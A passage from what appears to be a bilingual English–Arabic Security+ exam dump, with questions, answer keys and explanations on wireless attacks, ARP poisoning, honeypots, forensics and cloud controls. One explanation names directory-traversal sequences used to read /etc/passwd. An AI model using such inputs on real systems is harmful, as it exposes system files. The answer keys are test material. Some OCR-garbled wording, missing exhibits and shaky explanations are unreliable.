‫ أي مما يلي يجب أن يقوم متكامل الأنظمة بتكوينه ليكون‬.‫ الخاص بالشركة من أجل التحقق من صحة الموظفين الحاليين‬AD
LDAPS ‫الأكثر أمانا؟‬
Active ‫ (بروتوكول الوصول الخفيف إلى الدليل الآمن) هو البروتوكول الأكثر أمانا لاستخدامه للاتصال بخادم‬LDAPS :‫تفسير‬
‫ هذا يمنع التنصت أو العبث أو انتحال بيانات‬.TLS / SSL ‫ حيث يقوم بتشفير الاتصال بين العميل والخادم باستخدام‬، Directory
.‫المصادقة والتخويل‬
147 / 198
The safer , easier way to help you pass any IT exams.
273.A company's help desk has received calls about the wireless network being down and users being
unable to connect to it. The network administrator says all access points are up and running One of the
help desk technicians notices the affected users are working in a building near the parking lot.
Which of the following is the most likely reason for the outage?
A. Someone near the building is jamming the signal
B. A user has set up a rogue access point near the building
C. Someone set up an evil twin access point in the affected area.
D. The APs in the affected area have been unplugged from the network
Answer: A
Explanation:
Jamming is a type of denial-of-service attack that involves interfering with or blocking the wireless signal
using a device that emits radio waves at the same frequency as the wireless network. It can cause the
wireless network to be down and users to be unable to connect to it, especially if they are working in a
building near the parking lot where someone could easily place a jamming device.
‫ تلقى مكتب المساعدة التابع لشركة مكالمات بشأن تعطل الشبكة اللاسلكية وعدم قدرة المستخدمين على‬-273
‫ يقول مسؤول الشبكة إن جميع نقاط الوصول قيد التشغيل لاحظ أحد فنيي مكتب المساعدة أن‬.‫الاتصال بها‬
‫ أي مما يلي هو السبب الأكثر احتمالا للانقطاع؟‬.‫المستخدمين المتأثرين يعملون في مبنى بالقرب من موقف السيارات‬
‫شخص ما بالقرب من المبنى يقوم بالتشويش على الإشارة‬
‫ التشويش هو نوع من هجوم رفض الخدمة الذي يتضمن التدخل في الإشارة اللاسلكية أو حجبها باستخدام جهاز‬:‫تفسير‬
‫ يمكن أن يتسبب ذلك في تعطل الشبكة اللاسلكية وعدم قدرة‬.‫يصدر موجات لاسلكية بنفس تردد الشبكة اللاسلكية‬
‫ خاصة إذا كانوا يعملون في مبنى بالقرب من موقف السيارات حيث يمكن لشخص ما‬، ‫المستخدمين على الاتصال بها‬
.‫وضع جهاز تشويش بسهولة‬
274.A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user
can reach the internet but cannot access shared folders or other network resources.
Which of the following types of attacks is the user MOST likely experiencing?
A. Bluejacking
B. Jamming
C. Rogue access point
D. Evil twin
Answer: D
Explanation:
An evil twin attack is when an attacker sets up a fake Wi-Fi network that looks like a legitimate network,
but is designed to capture user data that is sent over the network. In this case, the user's laptop is
constantly disconnecting and reconnecting to the Wi-Fi network, indicating that it is connecting to the
fake network instead of the legitimate one. Once the user connects to the fake network, they are unable
to access shared folders or other network resources, as those are only available on the legitimate
network.
، ‫ بمجرد إعادة توصيل الكمبيوتر المحمول‬.Fi-Wi ‫ينقطع اتصال الكمبيوتر المحمول الخاص بالمستخدم باستمرار بشبكة‬.274
‫ أي من أنواع‬.‫يمكن للمستخدم الوصول إلى الإنترنت ولكن لا يمكنه الوصول إلى المجلدات المشتركة أو موارد الشبكة الأخرى‬
‫الهجمات التالية يتعرض لها المستخدم على الأرجح؟ التوأم الشرير‬
‫ ولكنها مصممة‬، ‫ مزيفة تبدو وكأنها شبكة شرعية‬Fi-Wi ‫ الهجوم المزدوج الشرير هو عندما يقوم المهاجم بإعداد شبكة‬:‫تفسير‬
‫ يقوم الكمبيوتر المحمول الخاص بالمستخدم بقطع‬، ‫ في هذه الحالة‬.‫لالتقاط بيانات المستخدم التي يتم إرسالها عبر الشبكة‬
‫ بمجرد‬.‫ مما يشير إلى أنه يتصل بالشبكة المزيفة بدلا من الشبكة الشرعية‬، ‫ باستمرار‬Fi-Wi ‫الاتصال وإعادة الاتصال بشبكة‬
‫ حيث لا تتوفر إلا على‬، ‫ لا يمكنه الوصول إلى المجلدات المشتركة أو موارد الشبكة الأخرى‬، ‫اتصال المستخدم بالشبكة المزيفة‬
.‫الشبكة الشرعية‬
148 / 198
The safer , easier way to help you pass any IT exams.
275.A company wants to deploy decoy systems alongside production systems in order to entice threat
actors and to learn more about attackers. Which of the follow r 3 best describes these systems?
A. DNS sinkholes
B. Honey pots
C. Virtual machines
D. Neural networks
Answer: B
Explanation:
Honey pots are decoy systems or resources that are designed to attract and deceive threat actors and to
learn more about their motives, techniques, etc. They can be deployed alongside production systems to
create an illusion of a vulnerable target and divert attacks away from the real systems. They can also
collect valuable information and evidence about the attackers and their activities for further analysis or
prosecution.
.‫ وتريد إحدى الشركات نشر نظم شرك إلى جانب نظم الإنتاج من أجل إغراء الجهات الفاعلة التي تشكل تهديدا ومعرفة المزيد عن المهاجمين‬-275
‫ يصف هذه الأنظمة؟ أواني العسل‬3 r ‫أي من الآتي‬
‫ أواني العسل هي أنظمة أو موارد شرك مصممة لجذب وخداع الجهات الفاعلة في التهديد ومعرفة المزيد عن دوافعهم وتقنياتهم وما إلى‬:‫تفسير‬
‫ يمكنهم أيضا جمع‬.‫ يمكن نشرها جنبا إلى جنب مع أنظمة الإنتاج لخلق وهم بوجود هدف ضعيف وتحويل الهجمات بعيدا عن الأنظمة الحقيقية‬.‫ذلك‬
.‫معلومات وأدلة قيمة حول المهاجمين وأنشطتهم لمزيد من التحليل أو المقاضاة‬
276.A network engineer receives a call regarding multiple LAN-connected devices that are on the same
switch. The devices have suddenly been experiencing speed and latency issues while connecting to
network resources.
The engineer enters the command show mac address-table and reviews the following output:
Which of the following best describes the attack that is currently in progress?
A. MAC flooding
B. Evil twin
C. ARP poisoning
D. DHCP spoofing
Answer: C
Explanation:
This is an attempt to redirect traffic to an attacking host by sending an ARP packet that contains the
forged address of the next hop router. The attacker tricks the victim into believing that it is the legitimate
router by sending a spoofed ARP reply with its own MAC address. This causes the victim to send all its
traffic to the attacker instead of the router. The attacker can then intercept, modify, or drop the packets as
they please.
‫ واجهت الأجهزة فجأة مشكلات في‬.‫ وموجودة على نفس المحول‬LAN ‫يتلقى مهندس شبكة مكالمة بخصوص أجهزة متعددة متصلة بشبكة‬.276
‫ أي مما يلي يصف‬:‫ ويراجع الإخراج التالي‬mac ‫ يقوم المهندس بإدخال الأمر إظهار جدول عناوين‬.‫السرعة وزمن الوصول أثناء الاتصال بموارد الشبكة‬
ARP ‫الهجوم الجاري حاليا؟ تسمم‬
.‫ تحتوي على عنوان مزور لجهاز التوجيه هوب التالي‬ARP ‫ هذه محاولة لإعادة توجيه حركة المرور إلى مضيف مهاجم عن طريق إرسال حزمة‬:‫تفسير‬
‫ يؤدي هذا إلى قيام الضحية‬.‫ الخاص به‬MAC ‫ مخادع بعنوان‬ARP ‫يخدع المهاجم الضحية للاعتقاد بأنه جهاز التوجيه الشرعي عن طريق إرسال رد‬
.‫ يمكن للمهاجم بعد ذلك اعتراض الحزم أو تعديلها أو إسقاطها كما يحلو له‬.‫بإرسال كل حركة المرور الخاصة بها إلى المهاجم بدلا من جهاز التوجيه‬
149 / 198
The safer , easier way to help you pass any IT exams.
277.A network engineer is troubleshooting wireless network connectivity issues that were reported by
users The issues are occurring only in the section of the building that is closest to the parking lot. Users
are intermittently experiencing slow speeds when accessing websites and are unable to connect to
network drives. The issues appear to increase when laptop users return to their desks after using their
devices in other areas of the building There have also been reports of users being required to enter their
credentials on web pages in order to gain access to them.
Which of the following is the most likely cause of this issue?
A. An external access point is engaging in an evil-Twin attack
B. The signal on the WAP needs to be increased in that section of the building
C. The certificates have expired on the devices and need to be reinstalled
D. The users in that section of the building are on a VLAN that is being blocked by the firewall
Answer: A
Explanation:
An evil-Twin attack is a type of wireless network attack that involves setting up a rogue access point that
mimics a legitimate one. It can trick users into connecting to the rogue access point instead of the real
one, and then intercept or modify their traffic, steal their credentials, launch phishing pages, etc. It is the
most likely cause of the issue that users are experiencing slow speeds, unable to connect to network
drives, and required to enter their credentials on web pages when working in the section of the building
that is closest to the parking lot, where an external access point could be placed nearby.
‫يقوم مهندس شبكات باستكشاف مشكلات الاتصال بالشبكة اللاسلكية التي أبلغ عنها المستخدمون وإصلاحها تحدث‬.277
‫ يعاني المستخدمون بشكل متقطع من سرعات بطيئة عند‬.‫المشكلات فقط في قسم المبنى الأقرب إلى موقف السيارات‬
‫ يبدو أن المشكلات تزداد عندما يعود مستخدمو‬.‫الوصول إلى مواقع الويب ولا يمكنهم الاتصال بمحركات أقراص الشبكة‬
‫الكمبيوتر المحمول إلى مكاتبهم بعد استخدام أجهزتهم في مناطق أخرى من المبنى كانت هناك أيضا تقارير عن مطالبة‬
‫ أي مما يلي هو السبب الأكثر‬.‫المستخدمين بإدخال بيانات الاعتماد الخاصة بهم على صفحات الويب من أجل الوصول إليها‬
‫احتمالا لهذه المشكلة؟ نقطة وصول خارجية تشارك في هجوم مزدوج شرير‬
‫ هجوم الشر المزدوج هو نوع من هجمات الشبكة اللاسلكية التي تتضمن إعداد نقطة وصول مارقة تحاكي نقطة‬:‫تفسير‬
‫ ثم اعتراض أو تعديل‬، ‫ يمكنه خداع المستخدمين للاتصال بنقطة الوصول المارقة بدلا من النقطة الحقيقية‬.‫وصول شرعية‬
‫ هذا هو‬.‫ وما إلى ذلك‬، ‫ وإطلاق صفحات التصيد الاحتيالي‬، ‫ وسرقة بيانات الاعتماد الخاصة بهم‬، ‫حركة المرور الخاصة بهم‬
، ‫ وغير قادرين على الاتصال بمحركات أقراص الشبكة‬، ‫السبب الأكثر ترجيحا للمشكلة أن المستخدمين يواجهون سرعات بطيئة‬
‫ويطلب منهم إدخال بيانات الاعتماد الخاصة بهم على صفحات الويب عند العمل في قسم المبنى الأقرب إلى موقف‬
.‫ حيث يمكن وضع نقطة وصول خارجية في مكان قريب‬، ‫السيارات‬
150 / 198
The safer , easier way to help you pass any IT exams.
278. An organization has hired a security analyst to perform a penetration test. The analyst captures 1Gb
worth of inbound network traffic to the server and transfers the pcap back to the machine for analysis.
Which of the following tools should the analyst use to further review the pcap?
A. Nmap
B. CURL
C. Neat
D. Wireshark
Answer: D
Explanation:
Wireshark is a tool that can analyze pcap files, which are files that capture network traffic. Wireshark can
display the packets, protocols, and other details of the network traffic in a graphical user interface. Nmap
is a tool that can scan networks and hosts for open ports and services. CURL is a tool that can transfer
data from or to a server using various protocols. Neat is a tool that can test network performance and
quality.
‫ جيجابايت من حركة مرور الشبكة الواردة‬1 ‫ يلتقط المحلل ما قيمته‬.‫استأجرت إحدى المنظمات محللا أمنيا لإجراء اختبار اختراق‬
‫ أي من الأدوات التالية يجب أن يستخدمها المحلل لمواصلة مراجعة‬.‫ مرة أخرى إلى الجهاز لتحليله‬pcap ‫إلى الخادم وينقل‬
Wireshark ‫؟‬pcap
‫ عرض‬Wireshark ‫ يمكن ل‬.‫ وهي ملفات تلتقط حركة مرور الشبكة‬، pcap ‫ هي أداة يمكنها تحليل ملفات‬Wireshark :‫تفسير‬
‫ هي أداة يمكنها فحص‬Nmap .‫الحزم والبروتوكولات والتفاصيل الأخرى لحركة مرور الشبكة في واجهة مستخدم رسومية‬
‫ هي أداة يمكنها نقل البيانات من أو إلى خادم باستخدام‬CURL .‫الشبكات والمضيفين بحثا عن المنافذ والخدمات المفتوحة‬
.‫ هي أداة يمكنها اختبار أداء الشبكة وجودتها‬Neat .‫بروتوكولات مختلفة‬
279. Which of the following secure application development concepts aims to block verbose error
messages from being shown in a user’s interface?
A. OWASP
B. Obfuscation/camouflage
C. Test environment
D. Prevent of information exposure
Answer: D
Explanation:
Preventing information exposure is a secure application development concept that aims to block verbose
error messages from being shown in a user’s interface. Verbose error messages are detailed messages
that provide information about errors or exceptions that occur in an application. Verbose error messages
may reveal sensitive information about the application’s structure, configuration, logic, or data that could
be exploited by attackers. Therefore, preventing information exposure involves implementing proper
error handling mechanisms that display generic or user-friendly messages instead of verbose error
messages.
‫أي من مفاهيم تطوير التطبيقات الآمنة التالية يهدف إلى منع ظهور رسائل الخطأ المطولة في واجهة المستخدم؟‬
‫منع التعرض للمعلومات‬
‫ منع التعرض للمعلومات هو مفهوم آمن لتطوير التطبيقات يهدف إلى منع ظهور رسائل الخطأ المطولة في واجهة‬:‫تفسير‬
‫ رسائل الخطأ المطولة هي رسائل مفصلة توفر معلومات حول الأخطاء أو الاستثناءات التي تحدث في أحد‬.‫المستخدم‬
‫ عن معلومات حساسة حول بنية التطبيق أو تكوينه أو منطقه أو بياناته التي‬Verbose ‫ قد تكشف رسائل أخطاء‬.‫التطبيقات‬
‫ يتضمن منع التعرض للمعلومات تنفيذ آليات مناسبة لمعالجة الأخطاء تعرض‬، ‫ لذلك‬.‫يمكن استغلالها من قبل المهاجمين‬
.‫رسائل عامة أو سهلة الاستخدام بدلا من رسائل الخطأ المطولة‬
151 / 198
The safer , easier way to help you pass any IT exams.
280.A security engineer obtained the following output from a threat intelligence source that recently
performed an attack on the company's server:
Which of the following best describes this kind of attack?
A. Directory traversal
B. SQL injection
C. API
D. Request forgery
Answer: A
Explanation:
Directory traversal is a type of web application attack that involves exploiting a vulnerability in the web
server or application to access files or directories that are outside the intended scope or root directory. It
can allow an attacker to read, modify, or execute files on the target system by using special characters
such as …/ or %2e%2e/ to manipulate the path or URL. In this case, the attacker used …/ to access the
/etc/passwd file, which contains user account information on Linux systems.
:‫ وحصل مهندس أمن على النواتج التالية من مصدر استخبارات للتهديدات شن مؤخرا هجوما على حاسوب خدمة الشركة‬-280
‫أي من الآتي يصف هذا النوع من الهجوم؟ اجتياز الدليل‬
‫ اجتياز الدليل هو نوع من هجمات تطبيقات الويب التي تتضمن استغلال ثغرة أمنية في خادم الويب أو التطبيق‬:‫تفسير‬
‫ يمكن أن يسمح للمهاجم بقراءة الملفات أو‬.‫للوصول إلى الملفات أو الدلائل الموجودة خارج النطاق المقصود أو الدليل الجذر‬
‫ في هذه‬.URL ‫ لمعالجة المسار أو عنوان‬/e2٪e2٪ ‫ أو‬/... ‫تعديلها أو تنفيذها على النظام الهدف باستخدام أحرف خاصة مثل‬
‫ والذي يحتوي على معلومات حساب المستخدم على أنظمة‬، passwd / etc / ‫ للوصول إلى‬/... ‫ استخدم المهاجم‬، ‫الحالة‬
.Linux
281.A company wants to enable BYOD for checking email and reviewing documents. Many of the
documents contain sensitive organizational information. Which of the following should be deployed first
before allowing the use of personal devices to accesscompany data?
A. MDM
B. RFID
C. DLR
D. SIEM
Answer: A
Explanation:
MDM stands for Mobile Device Management, which is a solution that can be used to manage and secure
personal devices that access company data. MDM can enforce policies and rules, such as password
protection, encryption, remote wipe, device lock, application control, and more. MDM can help a
company enable BYOD (Bring Your Own Device) while protecting sensitive organizational information.
‫ تحتوي العديد من الوثائق على معلومات‬.‫ من فحص البريد الإلكتروني ومراجعة المستندات‬BYOD ‫ تريد شركة تمكين‬-281
MDM ‫ أي مما يلي يجب نشره أولا قبل السماح باستخدام الأجهزة الشخصية للوصول إلى بيانات الشركة؟‬.‫تنظيمية حساسة‬
‫ وهو حل يمكن استخدامه لإدارة وتأمين الأجهزة الشخصية التي تصل إلى بيانات‬، ‫ تعني إدارة الأجهزة المحمولة‬MDM :‫تفسير‬
‫ مثل الحماية بكلمة مرور والتشفير والمسح عن بعد وقفل الجهاز والتحكم‬،‫ فرض السياسات والقواعد‬MDM ‫ يمكن ل‬.‫الشركة‬
‫ (إحضار جهازك الخاص) مع حماية المعلومات‬BYOD ‫ الشركة على تمكين‬MDM ‫ يمكن أن يساعد‬.‫في التطبيقات والمزيد‬
.‫التنظيمية الحساسة‬
152 / 198
The safer , easier way to help you pass any IT exams.
282. Given the following snippet of Python code:
Which of the following types of malware MOST likely contains this snippet?
A. Logic bomb
B. Keylogger
C. Backdoor
D. Ransomware
Answer: A
Explanation:
A logic bomb is a type of malware that executes malicious code when certain conditions are met. A logic
bomb can be triggered by various events, such as a specific date or time, a user action, a system
configuration change, or a command from an attacker. A logic bomb can perform various malicious
actions, such as deleting files, encrypting data, displaying messages, or launching other malware.
The snippet of Python code shows a logic bomb that executes a function called delete_all_files() when
the current date is December 25th. The code uses the datetime module to get the current date and
compare it with a predefined date object. If the condition is true, the code calls the delete_all_files()
function, which presumably deletes all files on the system.
‫ أي من أنواع البرامج الضارة التالية يحتوي على الأرجح على هذا المقتطف؟‬:Python ‫بالنظر إلى المقتطف التالي من كود‬
‫قنبلة منطقية‬
‫ يمكن تشغيل‬.‫ القنبلة المنطقية هي نوع من البرامج الضارة التي تنفذ تعليمات برمجية ضارة عند استيفاء شروط معينة‬:‫تفسير‬
‫ أو أمر من‬، ‫ أو تغيير تكوين النظام‬، ‫ أو إجراء مستخدم‬، ‫ مثل تاريخ أو وقت محدد‬، ‫القنبلة المنطقية من خلال أحداث مختلفة‬
‫ مثل حذف الملفات أو تشفير البيانات أو عرض الرسائل أو‬، ‫ يمكن للقنبلة المنطقية تنفيذ العديد من الإجراءات الضارة‬.‫مهاجم‬
‫ () عندما يكون‬delete_all_files ‫ قنبلة منطقية تنفذ وظيفة تسمى‬Python ‫ يظهر مقتطف شفرة‬.‫إطلاق برامج ضارة أخرى‬
‫ للحصول على التاريخ الحالي ومقارنته‬datetime ‫ تستخدم التعليمة البرمجية الوحدة النمطية‬.‫ ديسمبر‬25 ‫التاريخ الحالي هو‬
‫ والتي يفترض أنها‬، )( delete_all_files ‫ تستدعي التعليمة البرمجية الدالة‬، ‫ إذا كان الشرط صحيحا‬.‫بكائن تاريخ محدد مسبقا‬
.‫تحذف جميع الملفات الموجودة على النظام‬
153 / 198
The safer , easier way to help you pass any IT exams.
283. Which of the following incident response phases should the proper collection of the detected 'ocs
and establishment of a chain of custody be performed before?
A. Containment
B. Identification
C. Preparation
D. Recovery
Answer: A
Explanation:
Containment is the phase where the incident response team tries to isolate and stop the spread of the
incident12. Before containing the incident, the team should collect and preserve any evidence that may
be useful for analysis and investigation12. This includes documenting the incident details, such as date,
time, location, source, and impact12. It also includes establishing a chain of custody, which is a record of
who handled the evidence, when, where, how, and why3. A chain of custody ensures the integrity and
admissibility of the evidence in court or other legal proceedings3.
‫ المكتشفة وإنشاء سلسلة من العهدة من قبل؟‬ocs' ‫أي من مراحل الاستجابة للحوادث التالية يجب أن يتم التجميع الصحيح ل‬
‫الاحتواء‬
‫ يجب‬،‫ قبل احتواء الحادث‬.12‫ الاحتواء هو المرحلة التي يحاول فيها فريق الاستجابة للحوادث عزل ووقف انتشار الحادث‬:‫تفسير‬
‫ مثل التاريخ‬،‫ يتضمن ذلك توثيق تفاصيل الحادث‬.12‫على الفريق جمع وحفظ أي أدلة قد تكون مفيدة للتحليل والتحقيق‬
،‫ وأين‬،‫ ومتى‬،‫ وهي سجل لمن تعامل مع الأدلة‬،‫ ويشمل أيضا إنشاء سلسلة من العهدة‬.12‫والوقت والموقع والمصدر والتأثير‬
.3‫ يضمن تسلسل العهدة النزاهة و مقبولية الأدلة في المحكمة أو غيرها من الإجراءات القانونية‬.3‫ ولماذا‬،‫وكيف‬
284. Which of the following control types is patch management classified under?
A. Deterrent
B. Physical
C. Corrective
D. Detective
Answer: C
Explanation:
Patch management is classified as a corrective control because it is used to correct vulnerabilities or
weaknesses in systems and applications after they have been identified. It is a reactive approach that
aims to fix problems that have already occurred rather than prevent them from happening in the first
place.
‫أي من أنواع عناصر التحكم التالية يتم تصنيف إدارة التصحيح تحتها؟ تصحيحي‬
‫ تصنف إدارة التصحيح على أنها عنصر تحكم تصحيحي لأنها تستخدم لتصحيح نقاط الضعف أو نقاط الضعف في‬:‫تفسير‬
‫ إنه نهج تفاعلي يهدف إلى إصلاح المشكلات التي حدثت بالفعل بدلا من منعها من الحدوث‬.‫الأنظمة والتطبيقات بعد تحديدها‬
.‫في المقام الأول‬
154 / 198
The safer , easier way to help you pass any IT exams.
285. Cloud security engineers are planning to allow and deny access to specific features in order to in-
crease data security.
Which of the following cloud features is the most appropriate to ensure access is granted properly?
A. API integrations
B. Auditing
C. Resource policies
D. Virtual networks
Answer: C
Explanation:
Resource policies are cloud features that allow and deny access to specific features in order to increase
data security. Resource policies are rules or statements that define what actions can be performed on a
particular resource by which entities under what conditions. Resource policies can be attached to cloud
resources such as virtual machines, storage accounts, databases, or functions. Resource policies can
help enforce security best practices, compliance requirements, and cost management. Resource policies
can also help implement the principle of least privilege, which grants users only the minimum level of
access they need to perform their tasks.
‫ أي من ميزات السحابة التالية هي الأنسب‬.‫يخطط مهندسو أمان السحابة للسماح بالوصول إلى ميزات محددة ورفضها من أجل تجعيد أمان البيانات‬
‫لضمان منح الوصول بشكل صحيح؟ سياسات الموارد‬
‫ نهج الموارد هي قواعد أو‬.‫ سياسات الموارد هي ميزات سحابية تسمح بالوصول إلى ميزات محددة وترفضها من أجل زيادة أمان البيانات‬:‫تفسير‬
‫ يمكن إرفاق سياسات الموارد بالموارد السحابية مثل‬.‫بيانات تحدد الإجراءات التي يمكن تنفيذها على مورد معين من خلال الكيانات تحت أي ظروف‬
‫ يمكن أن تساعد نهج الموارد في فرض أفضل ممارسات الأمان ومتطلبات‬.‫الأجهزة الظاهرية أو حسابات التخزين أو قواعد البيانات أو الوظائف‬
‫ الذي يمنح المستخدمين الحد الأدنى فقط من مستوى‬،‫ يمكن أن تساعد نهج الموارد أيضا في تنفيذ مبدأ الامتياز الأقل‬.‫التوافق وإدارة التكاليف‬
.‫الوصول الذي يحتاجون إليه لأداء مهامهم‬
286.A digital forensics team at a large company is investigating a case in which malicious code was
downloaded over an HTTPS connection and was running in memory, but was never committed to disk.
Which of the following techniques should the team use to obtain a sample of the malware binary?
A. pcap reassembly
B. SSD snapshot
C. Image volatile memory
D. Extract from checksums
Answer: C
Explanation:
The best technique for the digital forensics team to use to obtain a sample of the malware binary is to
image volatile memory. Volatile memory imaging is a process of collecting a snapshot of the contents of
a computer's RAM, which can include active malware programs. According to the CompTIA Security+
SY0-601 Official Text Book, volatile memory imaging can be used to capture active malware programs
that are running in memory, but have not yet been committed to disk. This technique is especially useful
in cases where the malware is designed to self-destruct or erase itself from the disk after execution.
‫ وكانت تعمل في الذاكرة‬HTTPS ‫ويقوم فريق للطب الشرعي الرقمي في شركة كبيرة بالتحقيق في حالة تم فيها تنزيل شفرة خبيثة عبر وصلة‬-286
‫ أي من التقنيات التالية يجب أن يستخدمها الفريق للحصول على عينة من البرامج الضارة الثنائية؟‬.‫ولكنها لم تكن ملتزمة أبدا بالقرص‬
‫ذاكرة متقلبة للصورة‬
‫ تصوير‬.‫ أفضل تقنية لفريق الطب الشرعي الرقمي لاستخدامها للحصول على عينة من ثنائي البرامج الضارة هي تصوير الذاكرة المتقلبة‬:‫تفسير‬
‫ وفقا ل‬.‫ والتي يمكن أن تتضمن برامج ضارة نشطة‬، ‫الذاكرة المتطايرة هو عملية جمع لقطة لمحتويات ذاكرة الوصول العشوائي للكمبيوتر‬
‫ يمكن استخدام تصوير الذاكرة المتطايرة لالتقاط البرامج الضارة النشطة التي تعمل في‬، Book Text Official 601-SY0 + Security CompTIA
‫ هذه التقنية مفيدة بشكل خاص في الحالات التي تكون فيها البرامج الضارة مصممة للتدمير‬.‫ ولكن لم يتم الالتزام بها بعد على القرص‬، ‫الذاكرة‬
.‫الذاتي أو محو نفسها من القرص بعد التنفيذ‬
155 / 198
The safer , easier way to help you pass any IT exams.
287. Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing
equipment located in earthquake-prone areas?
A. Generators and UPS
B. Off-site replication
C. Additional warm site
D. Local
Answer: B
Explanation:
Off-site replication is a process of copying and storing data in a remote location that is geographically
separate from the primary site. It can ensure minimal downtime for organizations with critical computing
equipment located in earthquake-prone areas by providing a backup copy of data that can be accessed
and restored in case of a disaster or disruption at the primary site.
‫أي مما يلي يضمن الحد الأدنى من وقت التوقف عن العمل للمؤسسات مقابل معدات الحوسبة النقدية الموجودة في المناطق‬
‫المعرضة للزلازل؟ النسخ المتماثل خارج الموقع‬
‫ يمكن أن‬.‫ النسخ المتماثل خارج الموقع هو عملية نسخ البيانات وتخزينها في موقع بعيد منفصل جغرافيا عن الموقع الأساسي‬:‫تفسير‬
‫يضمن الحد الأدنى من وقت التوقف عن العمل للمؤسسات التي لديها معدات حوسبة مهمة تقع في المناطق المعرضة للزلازل من‬
.‫خلال توفير نسخة احتياطية من البيانات التي يمكن الوصول إليها واستعادتها في حالة وقوع كارثة أو اضطراب في الموقع الأساسي‬
288. An organization's corporate offices were destroyed due to a natural disaster, so the organization is
now setting up offices in a temporary work space.
Which of the following will the organization most likely consult?
A. The business continuity plan
B. The risk management plan
C. The communication plan
D. The incident response plan
Answer: A
Explanation:
A business continuity plan is a document or a process that outlines how an organization can continue its
critical operations and functions in the event of a disruption or disaster. It can include strategies and
procedures for recovering or relocating resources, personnel, data, etc., to ensure minimal downtime
and impact. The organization will most likely consult the business continuity plan when setting up offices
in a temporary work space after its corporate offices were destroyed due to a natural disaster.
‫ أي مما‬.‫ لذلك تقوم المنظمة الآن بإنشاء مكاتب في مساحة عمل مؤقتة‬، ‫تم تدمير مكاتب شركة منظمة بسبب كارثة طبيعية‬
‫يلي ستتشاور المنظمة على الأرجح؟ خطة استمرارية الأعمال‬
‫ خطة استمرارية الأعمال هي وثيقة أو عملية تحدد كيف يمكن للمؤسسة مواصلة عملياتها ووظائفها الحيوية في حالة‬:‫تفسير‬
، ‫ يمكن أن تشمل استراتيجيات وإجراءات لاستعادة أو نقل الموارد والموظفين والبيانات وما إلى ذلك‬.‫حدوث اضطراب أو كارثة‬
‫ من المرجح أن تستشير المنظمة خطة استمرارية الأعمال عند إنشاء مكاتب في‬.‫لضمان الحد الأدنى من وقت التوقف والتأثير‬
.‫مساحة عمل مؤقتة بعد تدمير مكاتب الشركة بسبب كارثة طبيعية‬
156 / 198
The safer , easier way to help you pass any IT exams.
289. Which of the following would satisfy three-factor authentication requirements?
A. Password, PIN, and physical token
B. PIN, fingerprint scan, and ins scan
C. Password, fingerprint scan, and physical token
D. PIN, physical token, and ID card
Answer: C
Explanation:
Three-factor authentication combines three types of authentication methods: something you know
(password), something you have (physical token), and something you are (fingerprint scan). Option C
satisfies these requirements, as it uses a password (something you know), a physical token (something
you have), and a fingerprint scan (something you are) for authentication.
‫أي مما يلي يفي بمتطلبات المصادقة ثلاثية العوامل؟ كلمة المرور ومسح بصمات الأصابع والرمز المميز الفعلي‬
‫ وشيء لديك (رمز‬، )‫ شيء تعرفه (كلمة المرور‬:‫ تجمع المصادقة ثلاثية العوامل بين ثلاثة أنواع من طرق المصادقة‬:‫تفسير‬
‫ ورمز‬، )‫ لأنه يستخدم كلمة مرور (شيء تعرفه‬، ‫ بهذه المتطلبات‬C ‫ يفي الخيار‬.)‫ وشيء أنت عليه (مسح بصمات الأصابع‬، )‫فعلي‬
.‫ ومسح بصمات الأصابع (شيء أنت) للمصادقة‬، )‫مادي (شيء لديك‬
290.A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The
Infrastructure needs to handle the unpredictable loads on the company's web application.
Which of the following cloud concepts would BEST these requirements?
A. SaaS
B. VDI
C. Containers
D. Microservices
Answer: C
Explanation:
Containers are a type of virtualization technology that allow applications to run in a secure, isolated
environment on a single host. They can be quickly scaled up or down as needed, making them an ideal
solution for unpredictable loads. Additionally, containers are designed to be lightweight and portable, so
they can easily be moved from one host to another.
‫ تحتاج البنية التحتية إلى التعامل مع‬.‫تحتاج الشركة إلى تعزيز قدرتها على الحفاظ على بنية تحتية سحابية قابلة للتطوير‬.290
‫ أي من المفاهيم السحابية التالية من شأنه أن يكون أفضل هذه‬.‫الأحمال غير المتوقعة على تطبيق الويب الخاص بالشركة‬
‫المتطلبات؟ حاويات‬
‫ الحاويات هي نوع من تقنيات المحاكاة الافتراضية التي تسمح بتشغيل التطبيقات في بيئة آمنة ومعزولة على مضيف‬:‫تفسير‬
‫ تم‬، ‫ بالإضافة إلى ذلك‬.‫ مما يجعلها حلا مثاليا للأحمال غير المتوقعة‬، ‫ يمكن زيادتها أو تقليلها بسرعة حسب الحاجة‬.‫واحد‬
‫ بحيث يمكن نقلها بسهولة من مضيف إلى آخر‬، ‫تصميم الحاويات لتكون خفيفة الوزن ومحمولة‬
157 / 198
The safer , easier way to help you pass any IT exams.
291.A systems engineer thinks a business system has been compromised and is being used to
exfiltrated data to a competitor The engineer contacts the CSIRT The CSIRT tells the engineer to
immediately disconnect the network cable and to not do anything else.
Which of the following is the most likely reason for this request?
A. The CSIRT thinks an insider threat is attacking the network
B. Outages of business-critical systems cost too much money
C. The CSIRT does not consider the systems engineer to be trustworthy
D. Memory contents including file les malware are lost when the power is turned off
Answer: D
Explanation:
Memory contents including files and malware are lost when the power is turned off. This is because
memory is a volatile storage device that requires constant power to retain data. If a system has been
compromised and is being used to exfiltrate data to a competitor, the CSIRT may want to preserve the
memory contents for forensic analysis and evidence collection. Therefore, the CSIRT may tell the
engineer to immediately disconnect the network cable and not do anything else to prevent further data
loss or tampering.
CSIRT ‫يعتقد مهندس نظم أن نظام عمل قد تم اختراقه و يتم استخدامه لتسريب البيانات إلى منافس يتصل المهندس ب‬.291
‫ أي مما يلي هو السبب الأكثر احتمالا‬.‫ من المهندس فصل كابل الشبكة على الفور وعدم القيام بأي شيء آخر‬CSIRT ‫يطلب‬
‫لهذا الطلب؟ يتم فقدان محتويات الذاكرة بما في ذلك البرامج الضارة عند إيقاف تشغيل الطاقة‬
‫ وذلك لأن الذاكرة عبارة عن‬.‫ يتم فقد محتويات الذاكرة بما في ذلك الملفات والبرامج الضارة عند إيقاف تشغيل الطاقة‬:‫تفسير‬
‫ إذا تم اختراق نظام ما ويتم استخدامه لاستخراج البيانات إلى منافس‬.‫جهاز تخزين متقلب يتطلب طاقة ثابتة للاحتفاظ بالبيانات‬
